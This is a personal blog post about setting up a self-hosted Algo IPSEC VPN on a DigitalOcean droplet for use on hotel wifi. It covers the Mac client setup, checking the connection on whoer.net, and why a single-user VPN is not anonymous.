I have been toying with the idea of using a VPN for a while now. Going to security conventions and using the hotel's public wifi has never let me sleep well at night, and a VPN would minimize that issue. I considered a few paid services but ultimately decided to go the "create your own for cheap" route. The infosec community has been buzzing about Algo. Algo VPN "is a set of Ansible scripts that simplify the setup of a personal IPSEC VPN. It uses the most secure defaults available, works with common cloud providers, and does not require client software on most devices. See our release announcement for more information."

This blog is hosted on a DigitalOcean droplet. I’m familiar with how droplets work and when I heard that Algo can create a droplet and use it as a VPN provider, I jumped at the opportunity.

How I setup my Algo VPN

Following the README.md of the Algo GitHub repo is very straightforward. The idea is to clone the repo to your local computer. After installing the dependencies and setting up the config file with the users to expect, Algo takes care of all the heavy lifting by using DigitalOcean's API to create the droplet and set up the VPN.

I cloned the repo onto my Mac, installed the Python dependencies and had only one hiccup: on a Mac you need to have Xcode installed and to have agreed to its license. All of the files required to set up the VPN clients are saved to the config folder after the script runs. To connect my Mac, all I had to do was double click the <username>.mobileconfig file and everything was fully set up.

I’ll have to update this post as I setup my other devices. Windows computers and Android phones are on my to do list.

To test whether the VPN is working, visit whoer.net and check whether the address connecting to the site is the droplet's IP or your computer's IP. The caveat of a VPN like this is that it is not anonymous. Website operators can tell your connection is coming from a DigitalOcean droplet, because ownership of the IP range is public information, and since only you use that droplet, every connection from its address is yours. Just as someone can watch traffic leaving a Tor exit node, a well-known VPN provider's address ranges can be monitored too; it is only a matter of time before the usage of that droplet is mapped out.

That’s not all folks

VPNs are only one part of a secure digital life. Using HTTPS when connecting to websites, using a unique password for every account, and enabling two-factor authentication are also important. As for "providers selling our data", the best way to prevent that is to choose providers with a stronger commitment to their users than to improving their profits.